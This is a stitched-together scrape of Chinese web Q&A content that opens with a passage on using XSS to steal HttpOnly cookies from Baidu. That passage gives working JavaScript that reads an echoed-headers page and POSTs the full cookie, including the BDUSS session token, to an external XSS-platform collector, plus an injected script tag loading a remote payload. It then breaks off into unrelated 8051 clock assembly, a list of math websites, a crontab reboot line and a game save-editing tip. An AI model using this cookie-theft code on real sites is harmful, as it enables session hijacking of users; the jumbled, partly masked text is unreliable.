如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = 'http://buv.me/index.php?do=apiid={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "http://appstest.baidu.com/http/echoheader.php", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 http://appstest.baidu.com/ 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/e80c9b4ecb9c252d6bdfdb21c335164d 中有提到, http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=http://00f.me/XbSWCk/script
89c51 用汇编语言求一时钟程序,图如下
HOUR EQU 030H ;小时缓存
MINUTE EQU 031H ;分钟缓存
SECOND EQU 032H ;秒缓存
DHOUR EQU 040H ;定时小时缓存
DMINUTE EQU 041H ;定时分钟缓存
AJBZ EQU 042H ;按键次数标志
DSBZ EQU 022H ;定时开关标志
COUNT1 EQU 033H ;总计数到4000:拆分成40*100 总计数1
COUNT2 EQU 034H
SPL EQU 020H ;闪烁判断的依据
SET_ *** N EQU 021H ;按键标志位
ORG 0000H
AJMP MAIN
ORG 001BH ;定时计数器T1中断入口地址
AJMP IT_1
ORG 040H
MAIN:MOV SPL,#00H ;闪烁标志清零
MOV DPTR,#TABLE ;码段首地址
MOV HOUR,#00H ;小时缓存清零
MOV MINUTE,#00H ;分缓存清零
MOV DHOUR,#00H ;定时小时缓存清零
MOV DMINUTE,#00H ;定时分缓存清零
MOV SECOND,#00H ;秒缓存清零
MOV AJBZ,#00H ;按键次数缓存清零
MOV COUNT1,#00H ;总计数1清零
MOV COUNT2,#00H ;总计数2清零
MOV DHOUR,#00H ;定时小时地址清零
MOV DSBZ,#00H ;定时开关标志清零
CLR P3.0 ;定时时间到控制位清零
MOV TMOD,#20H ;设置计数方式
MOV TH1,#06H ;定时计数器T1高八位初值
MOV TL1,#06H ;定时计数器低八位初值
MOV IE,#10001000B ;设置允许中断,并且打开两个定时器
SETB TR1
LOOP:JNB P0.0,JUST_TIME ;P0.0为零跳转(调时操作)
JB SET_ *** N.0,JUST_TIME ;标志位为1跳转
JNB P0.1, SUBB_TIME ;减操作
JB SET_ *** N.1,SUBB_TIME
JNB P0.2, ADD_TIME ;加操作
JB SET_ *** N.2,ADD_TIME
JB P0.7,TIME
CLR P3.0
TIME1:JB SPL.3,DSXS ;转定时小时显示
JB SPL.4,DSXS ;转定时分钟显示
JB SPL.5,DSXS ;转定时开关显示
ACALL HOUR_SHOW ;小时显示
ACALL MINUTE_SHOW ;分钟显示
ACALL SECOND_SHOW ;秒显示
FHLOOP:AJMP LOOP
DSXS:ACALL DHOUR_SHOW ;定时小时显示
ACALL DMINUTE_SHOW ;定时分钟显示
ACALL DSECOND_SHOW ;定时开关显示
AJMP LOOP
JUST_TIME:
LJMP JUST_TIME1
SUBB_TIME:
JB SET_ *** N.1,WAIT_ *** N2_UP
ACALL DELAY2;
JB P0.1, TIME
SETB SET_ *** N.1
JB SPL.1,SUBB_HOUR
JB SPL.2,SUBB_MIN
JB SPL.3,DSUBB_HOUR
JB SPL.4,DSUBB_MIN
JB SPL.5,GDS
AJMP TIME
ADD_TIME:
LJMP ADDTIME
SUBB_MIN:
MOV R1,MINUTE
CJNE R1,#00H,SUBB_MIN_OPT
MOV MINUTE,#3BH
AJMP TIME
SUBB_MIN_OPT:
DEC MINUTE
AJMP TIME
DSUBB_MIN:
MOV R1,DMINUTE
CJNE R1,#00H,DSUBB_MIN_OPT
MOV DMINUTE,#3BH
AJMP TIME
DSUBB_MIN_OPT:
DEC DMINUTE
AJMP TIME
SUBB_HOUR:
MOV R1,HOUR
CJNE R1,#00H,SUBB_HOUR_OPT
MOV HOUR,#17H
AJMP TIME
SUBB_HOUR_OPT:
DEC HOUR
AJMP TIME
DSUBB_HOUR:
MOV R1,DHOUR
CJNE R1,#00H,DSUBB_HOUR_OPT
MOV DHOUR,#17H
AJMP TIME
DSUBB_HOUR_OPT:
DEC DHOUR
AJMP TIME
WAIT_ *** N2_UP:
JNB P0.1,TIME
CLR SET_ *** N.1
AJMP TIME
TIME:LJMP TIME1
GDS:CLR DSBZ.0
LJMP TIME
ADDTIME:JB SET_ *** N.2,WAIT_ *** N3_UP
ACALL DELAY2
JB P0.2, TIME
SETB SET_ *** N.2
JB SPL.1,ADD_HOUR
JB SPL.2,ADD_MIN
JB SPL.3,DADD_HOUR
JB SPL.4,DADD_MIN
JB SPL.5,KDS
LJMP TIME
ADD_MIN:MOV R1,MINUTE
CJNE R1,#3BH,ADD_MIN_OPT
MOV MINUTE,#00H
LJMP TIME
ADD_MIN_OPT:
INC MINUTE
LJMP TIME
DADD_MIN:
MOV R1,DMINUTE
CJNE R1,#3BH,DADD_MIN_OPT
MOV DMINUTE,#00H
LJMP TIME
DADD_MIN_OPT:
INC DMINUTE
LJMP TIME
ADD_HOUR:
MOV R1,HOUR
CJNE R1,#17H,ADD_HOUR_OPT
MOV HOUR,#00H
LJMP TIME
ADD_HOUR_OPT:
INC HOUR
LJMP TIME
DADD_HOUR:
MOV R1,DHOUR
CJNE R1,#17H,DADD_HOUR_OPT
MOV DHOUR,#00H
LJMP TIME
DADD_HOUR_OPT:
INC DHOUR
LJMP TIME
WAIT_ *** N3_UP:
JNB P0.2,TIME
CLR SET_ *** N.2
LJMP TIME
KDS:SETB DSBZ.0
LJMP TIME
JUST_TIME1:
JB SET_ *** N.0,WAIT_UP
ACALL DELAY2
JB P0.0, TIME
SETB SET_ *** N.0
MOV R1,AJBZ
CJNE R1,#05H,INC1
MOV AJBZ,#00H
MOV SPL,#00H
LJMP TIME
INC1:INC AJBZ
MOV R1,AJBZ
CJNE R1,#01H, *** FZ ;计时分钟
SETB SPL.1
LJMP TIME
*** FZ:CJNE R1,#02H,DSX ;定时小时
CLR SPL.1
SETB SPL.2
LJMP TIME
DSX:CJNE R1,#03H,DSFZ ;定时分钟
CLR SPL.2
SETB SPL.3
LJMP TIME
DSFZ:CJNE R1,#04H,DSKG ;定时开关
CLR SPL.3
SETB SPL.4
DSKG:CJNE R1,#05H,LJUMP_TIME ;返回显示状态
CLR SPL.4
SETB SPL.5
LJUMP_TIME:
LJMP TIME
WAIT_UP:JNB P0.0,LJUMP_TIME ;等待按键松开,松开后清零按键标志
CLR SET_ *** N.0
LJMP TIME
WAIT2_DL1:
ACALL DELAY1
ACALL DELAY1
RET
HOUR_SHOW:
JNB SPL.1, HOUR_SHOW_HRER
JB SPL.0, HOUR_SHOW_HRER
ACALL WAIT2_DL1
RET
HOUR_SHOW_HRER: ;小时显示
SETB P2.6
SETB P2.7
CLR A
MOV A,HOUR
MOV B,#0AH
DIV AB ;小时十位在A中,个位在B中
MOVC A,@A+DPTR
MOV P1,#00H ;P1口控制显示数据,此时显示小时十位数据
MOV P1,A
CLR P2.7 ;P2口控制位置(低电平有效;共阴显示)
;延时
ACALL DELAY1
SETB P2.7 ;熄灭小时
MOV P1,#00H
MOV A,B ;B中存放的小时各位数据放入A
MOVC A,@A+DPTR
MOV P1,A
CLR P2.6 ;显示小时个位数据
;延时
ACALL DELAY1
SETB P2.6
MOV P1,#00H
RET
MINUTE_SHOW:
JNB SPL.2, MINUTE_SHOW_HERE
JB SPL.0, MINUTE_SHOW_HERE
ACALL WAIT2_DL1
RET
MINUTE_SHOW_HERE:
SETB P2.5
SETB P2.4
CLR A
MOV A,MINUTE
MOV B,#0AH
DIV AB
MOVC A,@A+DPTR
MOV P1,#00H
MOV P1,A
CLR P2.5
;延时
ACALL DELAY1
SETB P2.5
MOV P1,#00H
MOV A,B
MOVC A,@A+DPTR
MOV P1,A
CLR P2.4
;延时
ACALL DELAY1
SETB P2.4
MOV P1,#00H
RET
SECOND_SHOW:
SETB P2.3
SETB P2.2
CLR A
MOV A,SECOND
MOV B,#0AH
DIV AB
MOVC A,@A+DPTR
MOV P1,#00H
MOV P1,A
CLR P2.3
;延时
ACALL DELAY1
SETB P2.3
MOV P1,#00H
MOV A,B
MOVC A,@A+DPTR
MOV P1,A
CLR P2.2
;延时
ACALL DELAY1
SETB P2.2
JNB DSBZ.0,DYFH ;定时比较开始
JB P3.0,DYFH
MOV A,HOUR
CJNE A,DHOUR,DYFH
MOV A,MINUTE
CJNE A,DMINUTE,DYFH
SETB P3.0
DYFH:RET
DHOUR_SHOW: ;调整定时时间显示
JNB SPL.3,XSS
JB SPL.0, XSS
ACALL WAIT2_DL1
RET
XSS:SETB P2.6
SETB P2.7
CLR A
MOV A,DHOUR
MOV B,#0AH
DIV AB ;小时十位在A中,个位在B中
MOVC A,@A+DPTR
MOV P1,#00H ;P1口控制显示数据,此时显示小时十位数据
MOV P1,A
CLR P2.7 ;P2口控制位置(低电平有效;共阴显示)
;延时
ACALL DELAY1
SETB P2.7 ;熄灭小时
MOV P1,#00H
MOV A,B ;B中存放的小时个位数据放入A
MOVC A,@A+DPTR
MOV P1,A
CLR P2.6 ;显示小时个位数据
;延时
ACALL DELAY1
SETB P2.6
MOV P1,#00H
RET
;定时分钟显示
DMINUTE_SHOW:
JNB SPL.4,XSF
JB SPL.0, XSF
ACALL WAIT2_DL1
RET
XSF:SETB P2.5
SETB P2.4
CLR A
MOV A,DMINUTE
MOV B,#0AH
DIV AB
MOVC A,@A+DPTR
MOV P1,#00H
MOV P1,A
CLR P2.5
;延时
ACALL DELAY1
SETB P2.5
MOV P1,#00H
MOV A,B
MOVC A,@A+DPTR
MOV P1,A
CLR P2.4
;延时
ACALL DELAY1
SETB P2.4
MOV P1,#00H
RET
;定时开关显示
DSECOND_SHOW:
JNB SPL.5,X *** ;显示秒(定时开关)
JB SPL.0,X ***
ACALL WAIT2_DL1
RET
X *** :SETB P2.3
SETB P2.2
CLR A
MOV A,#00H
MOVC A,@A+DPTR
MOV P1,A
CLR P2.3
;延时
ACALL DELAY1
SETB P2.3
MOV P1,#00H
JNB DSBZ.0,GBZ ;关标志
MOV A,#0BH
AJMP XS
GBZ:MOV A,#0AH
XS:MOVC A,@A+DPTR
MOV P1,A
CLR P2.2
;延时
ACALL DELAY1
SETB P2.2
MOV P1,#00H
RET
;短延时 ;显示短延时
DELAY1:MOV R6,#03H
DL1:MOV R7,08H
DL2:DJNZ R7,DL2
DJNZ R6,DL1
RET
;按键延时
DELAY2:MOV R6,#0AH
DL21:MOV R7,0AH
DL22:DJNZ R7,DL22
DJNZ R6,DL21
RET
IT_1:PUSH ACC
PUSH B
PUSH PSW
INC COUNT1
MOV A,COUNT1
CJNE A,#28H,RETI_LABLE
INC COUNT2
MOV COUNT1,#00H
MOV A,COUNT2
MOV B,#32H
DIV AB
MOV A,B
JNZ C2_OPT
CPL P3.7 ;秒的闪烁
CPL SPL.0 ;调整闪烁
C2_OPT:MOV A,COUNT2
CJNE A,#64H,RETI_LABLE
INC SECOND
MOV COUNT2,#00H
MOV A,SECOND
CJNE A,#3CH,RETI_LABLE;
INC MINUTE
MOV SECOND,#00H
MOV A,MINUTE
CJNE A,#3CH,RETI_LABLE;
INC HOUR
MOV MINUTE,#00H
MOV A,HOUR
CJNE A,#18H,RETI_LABLE
MOV HOUR,#00H
RETI_LABLE:
POP PSW
POP B
POP ACC
RETI
;TABLE:DB 3FH,06H,5BH,4FH,66H,6DH,7DH,07H,7FH,6FH,40H ;共阴码表
TABLE:DB 0C0H,0F9H,0A4H,0B0H,99H,92H,82H,0F8H,80H,90H,8EH,0C8H ;共阳码表
; 0 1 2 3 4 5 6 7 8 9 F N
END
可以实现控制家用电器的定时。比如什么时候想烧水就定时到那个时间,等你用的时候水就开了,很方便的
数学网站有什么
中国数学会 http://ww.cms.org.cn
中国科学院数学所 http://www.math.ac.cn/
数学奥林匹克俱乐部 http://mathclub.chination.net/
人教社/中学数学 http://www.pep.com.cn/zhongxueshuxue/cbs-math.htm
K12教师频道/数学http://www.k12.com.cn/teacher/sub_edu/math/
中基网/数学http://www.cbe21.com/subject/maths/
广东教育资源网/数学http://iai.edu123.com/zyk.shuxue.index.php
科普网/数学栏目http://kepuwang.51.net/fxm/maths/maths.htm
江门教育信息网/数学http://www.5ewy.com/shuxue/
数学史http://www.edp.ust.hk/math/history
中华数学网http://www.sino-maths.net/
数学人http://www.manofmath.com/
21世纪数学网http://www.sxz.3322.net/
中学数学教与学http://shuxue.fsjy.net/
数学教育联盟http://mathteach.myetang.com/
数学教育110 http://www.maths110.com/
数学教育教学网http://www.emathedu.com
延安数学教育网http://yamaths.myrice.com/
数学之家(初中版)http://mathsonline.yeah.net
小学数学http://xxmaths.stedu.net/
1+e数学乐园网站http://www.aoshu.com/
华博士小学数学热线http://www.mm6.com.cn
小学数学资源网http://xiaohu.fsjy.net/
数学教育网http://www.mathsedu.net/
嘉定教育数学教案http://www.jdedu.sh.cn/ziyuan/jiaoan/shuxue/sx.htm
中国教案网http://www.jiaoan.com/
教育教学论文网http://www.minaol.com/gb/art/ttd/index.asp
上海市中小学教育信息库数学资料http://202.109.69.165/sx/
高中数学资源网http://m *** aths.51.net/xinjiaocai.htm
数学通报http://www.shuxuetongbao.com/
数理天地http://www.mpw91.com/
台大数学系http://www.math.ntu.edu.tw/
数学资讯网http://infomath.nctu.edu.tw/
教育资讯站数学网http://www.edp.ust.hk/math/
台湾师范大学数学系http://www.math.ntnu.edu.tw/index-c.html
数学资料库http://ihome.cuhk.edu.hk/~s005636/
中数数学资源网站http://mlinux.pmsh.tnc.edu.tw/~handyc/
数学之路http://www.math-ways.net/
数学试题交流http://cc.pnjh.ttct.edu.tw/~tyrant/math.htm
国外站点
国际数学联盟http://www.mathunion.org/
欧洲数学会http://www.emis.de
国际数学奥林匹克http://camel.math.ca/IMO
美、加数学夏令营http://www.mathcamp.org/
澳大利亚数学竞赛http://www.amt.canberra.edu.au/
美国数学竞赛http://www.unl.edu/amc/
青年数学家网http://www.youngmath.org/
数学软件
华方教育软件园http://edusoft.huafang.net/list.asp?atype=课件aobject=数学
K12软件交流中心
http://download.k12.com.cn/index ... ndex=ViewType=数学
中国教育软件网http://www.pujiao.com.cn/software/downindex.asp
中国教育先锋/资源频道http://www.ep-china.net/asdown/search.asp?type=数学grade
课件大师http://www.powercai.com
*** 闪课http://www.cncai.net/
课堂教学课件站http://spschool.myrice.com
奥思在线http://www.auth.com.cn/
多媒体大师Authorware http://tech.chin *** /zh_cn/netschool/multimedia/authorware/
课件苑http://jetshing.myetang.com/
个人主页
长沙市一中数学园http://www.sx110.com
草塔中学数学组http://sq.k12.com.cn:9000/jw/jwchy/index.htm
高中数学教与学http://sq. k12.com.cn:9000/hf/hf93/
数学之家http://asp.6to23.com/jygz/sx/
开泉涤尘http://cdxh.myetang.com/
数学天地http://mathsgarden.myrice.com/
高中数学家园http://266.6to23.com/
中学数学教学研究http://sq. k12.com.cn:9000/gz/gzyyh/
数学长廊http:// sq. k12.com.cn:9000/sx/sxcl/
阿海数学教室http://go4.163.com/shoudh/
初中数学资料库http://linhejun.diy.163.com/
数学空间http://go1.163.com/dyzhangl/
数学屋http://sxnet.xiloo.com/
数学新圃http://lhbyczx.tongtu.net/
心仪数学http://go8.163.com/mathskj/
蓝天热线http://vip.6to23.com/zgw/
数学驿站http://52mth.8u8.com/
小学数学试卷网http://sq.k12.com.cn:9000/xs/xssx11511/
小学数学竞赛之窗http://xx.luohuedu.net/homepage/teacher/zjyu/
小学数学急先锋http://sxjxf51.51.net/
数学金豆http://sq.k12.com.cn:9000/ji/jindou/
云天http://gaoyun63.diy.163.com
网蛇之家http://go5.163.com/wyou/
天涯客栈http://www.skyya.net/
欣欣数学园http://go3.163.com/zjjhtxx/index.html
不学无数http://gzsx.51.net/
晓明数学园http://go5.163.com/wyzxm/
业余数学天地http://extend.hk.hi.cn/-zzm/
树明的个人主页http://go2.163.com/bobcow/
数学教师驿站http://www.mathssky.com/
数学教育之窗http://home.cfe21.com/yang/zy.htm
龙龙的数学世界http://shuxue123.myrice.com
论坛
K12虚拟社区/数学物理论坛http://sq.k12.com.cn/forums/list.php3?num=32
数学教育论坛http://www.mathsedu.com/forum/index.asp
新世纪教材论坛http://211.99.203.180/basic/lt/index1.php?fn=数学(1-6)f=11
中国基础教育21世纪/数学论坛
http://www.cfe21.com/Forum/Forum ... pid=1forumid=3
不学无数社区http://gzsx.51.net/wdb/index.php
数学教师驿站论坛http://www.mathssky.com/bbs/index.asp
课件大师今曰论坛http://www.powercai.com/luntan/
中国普教图书网论坛http://www.pujiao.com.cn/bbs/index.asp
人教社/小学数学论坛http://chat.pep.com.cn/lb5000/forums.cgi?forum=8
小学数学网论坛http://xxmaths.stedu.net/bbs/default.asp
关于linux系统中服务的部署和自动重启问题
用root用户登录系统 crontab -e #创建计划任务 按i进入输入模式,添加如下行 01 2 * * * reboot #该行表示每天2:01重启机器
谁会造梦西游3极品号源帮我弄
1、用IE打开造梦西游3创一个号新建一个角色。
2、进入九重天后马上退回来,点机文件—脱机工作—保存游戏。
3、打开我的电脑到C、E、D盘(反正所有盘)搜索#4399这个文件。
4、打开文件找到一个文件夹(4399帐号和刚刚的创建的帐号一样的)把里面的一个文件剪贴下来到桌面上再打开flashSolEditer修改器点击打开SOL文件找到刚刚剪贴下来的文件。
5、打开很长的字母的地方把原来的号源给删了把极品号源复制上去(如果是悟空就悟空,反正是那个人物就是那个人物的号源)点击保存SOL文件,再把在桌面的那文件在弄到4399帐号和刚刚的创建的帐号一样的文件里,在打开造梦3连刷新—连接就好了 。
造梦西游3极品号源怎么用就为您介绍到这里啦,呵呵!
求采纳